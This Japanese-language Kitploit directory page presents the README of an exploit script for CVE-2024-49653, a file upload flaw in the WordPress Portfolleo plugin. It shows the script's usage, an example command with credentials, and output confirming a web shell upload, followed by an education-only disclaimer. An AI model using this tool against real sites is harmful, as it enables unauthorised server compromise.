Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-49653 — WordPress Portfolleo プラグイン <= 1.2 - 任意ファイルアップロードの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-49653
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-49653

CVE-2024-49653

WordPress Portfolleo プラグイン <= 1.2 - 任意ファイルアップロードの脆弱性

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

📜 WordPress Portfolleo プラグイン エクスプロイト (CVE-2024-49653)

🚨 脆弱性の詳細

タイトル: WordPress Portfolleo プラグイン <= 1.2 - 任意ファイルアップロードの脆弱性

説明:
James Eggers の Portfolleo portfolleo における危険なタイプのファイルの制限なしアップロードの脆弱性により、Web サーバーに Web シェルをアップロードできます。この問題は Portfolleo のバージョン n/a から 1.2 に影響します。

詳細情報:

  • CWE-434: 危険なタイプのファイルの制限なしアップロード

CVSS スコア:

  • スコア: 9.9
  • 深刻度: 重大
  • バージョン: 3.1
  • ベクター文字列: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 ユーザーガイド

🚀 スクリプトの使い方

このスクリプトは、WordPress Portfolleo プラグイン (バージョン <= 1.2) の任意ファイルアップロードの脆弱性を悪用して Web シェルをアップロードします。

📦 必要条件

スクリプトを実行するには、以下がインストールされている必要があります:

  • Python 3
  • requests ライブラリ
  • beautifulsoup4 ライブラリ

必要なライブラリは次のコマンドでインストールできます:

root@kitploit:~
pip install requests beautifulsoup4

🛠️ 使い方

以下のオプションを指定してスクリプトを実行します:

root@kitploit:~

CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

📝 例

root@kitploit:~
 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123

📊 期待される出力

スクリプトが正常に実行された場合、以下の出力が表示されます:

root@kitploit:~
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php

⚠️ 免責事項

このスクリプトは教育目的のみを意図しています。作者は本スクリプトの違法行為への使用を容認しません。責任を持って、明示的なテスト許可があるシステムでのみ使用してください。

作成者: Nxploited | Khaled Alenazi

ツールをダウンロード